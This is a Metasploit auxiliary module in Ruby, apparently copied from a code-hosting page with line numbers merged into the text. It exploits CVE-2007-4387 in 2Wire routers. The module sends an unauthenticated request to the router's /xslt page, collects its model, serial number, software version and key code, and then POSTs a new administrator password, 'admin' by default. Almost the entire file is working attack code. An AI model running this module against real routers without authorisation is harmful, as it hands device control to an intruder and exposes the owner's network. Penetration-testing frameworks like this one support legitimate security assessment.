Path: blob/master/modules/auxiliary/admin/2wire/xslt_password_reset.rb
19778 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(10update_info(11info,12'Name' => '2Wire Cross-Site Request Forgery Password Reset Vulnerability',13'Description' => %q{14This module will reset the admin password on a 2Wire wireless router. This is15done by using the /xslt page where authentication is not required, thus allowing16configuration changes (such as resetting the password) as administrators.17},18'License' => MSF_LICENSE,19'Author' => [20'hkm [at] hakim.ws', # Initial discovery, poc21'Travis Phillips', # Msf module22],23'References' => [24[ 'CVE', '2007-4387' ],25[ 'OSVDB', '37667' ],26[ 'BID', '36075' ],27[ 'URL', 'https://seclists.org/bugtraq/2007/Aug/225' ],28],29'DisclosureDate' => '2007-08-15',30'Notes' => {31'Stability' => [CRASH_SAFE],32'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],33'Reliability' => []34}35)36)3738register_options(39[40OptString.new('PASSWORD', [true, 'The password to reset to', 'admin'])41]42)43end4445def post_auth?46false47end4849def run50print_status("Attempting to connect to http://#{rhost}/xslt?PAGE=A07 to gather information")51res = send_request_raw(52{53'method' => 'GET',54'uri' => '/xslt?PAGE=A07'55}, 2556)5758if !res59print_error('No response from server')60return61end6263# check to see if we get HTTP OK64if (res.code == 200)65print_status('Okay, Got an HTTP 200 (okay) code. Verifying Server header')66else67print_error('Did not get HTTP 200, URL was not found. Exiting!')68return69end7071# Check to verify server reported is a 2wire router72if res.headers['Server'].match(/2wire Gateway/i)73print_status("Server is a 2wire Gateway! Grabbing info\n")74else75print_error("Target doesn't seem to be a 2wire router. Exiting!")76return77end7879print_status('---===[ Router Information ]===---')8081# Grabbing the Model Number82if res.body.match(%r{<td class="textmono">(.*)</td>}i)83model = ::Regexp.last_match(1)84print_status("Model: #{model}")85end8687# Grabbing the serial Number88if res.body.match(%r{<td class="data">(\d{12})</td>}i)89serial = ::Regexp.last_match(1)90print_status("Serial: #{serial}")91end9293# Grabbing the Hardware Version94if res.body.match(%r{<td class="data">(\d{4}-\d{6}-\d{3})</td>}i)95hardware = ::Regexp.last_match(1)96print_status("Hardware Version: #{hardware}")97end9899# Check the Software Version100if res.body.match(%r{<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>}i)101ver = ::Regexp.last_match(1)102print_status("Software version: #{ver}")103else104print_error('Target is not a version 5 router. Exiting!')105return106end107108# Grabbing the Key Code109if res.body.match(%r{<td class="data">(\w{4}-\w{4}-\w{4}-\w{4}-\w{4})</td>}i)110key = ::Regexp.last_match(1)111print_status("Key Code: #{key}\n")112end113114print_status("Attempting to exploit Password Reset Vulnerability on #{rhost}")115print_status("Connecting to http://#{rhost}/xslt?PAGE=H04 to make sure page exist.")116117res = send_request_raw(118{119'method' => 'GET',120'uri' => '/xslt?PAGE=H04'121}, 25122)123124if res && (res.code == 200) && res.body.match(%r{<title>System Setup - Password</title>}i)125print_status("Found password reset page. Attempting to reset admin password to #{datastore['PASSWORD']}")126127data = 'PAGE=H04_POST'128data << '&THISPAGE=H04'129data << '&NEXTPAGE=A01'130data << '&PASSWORD=' + datastore['PASSWORD']131data << '&PASSWORD_CONF=' + datastore['PASSWORD']132data << '&HINT='133134res = send_request_cgi(135{136'method' => 'POST',137'uri' => '/xslt',138'data' => data139}, 25140)141142if res && (res.code == 200)143cookies = res.get_cookies144if cookies && cookies.match(%r{(.*); path=/})145cookie = ::Regexp.last_match(1)146print_good("Got cookie #{cookie}. Password reset was successful!\n")147end148end149end150end151end152153154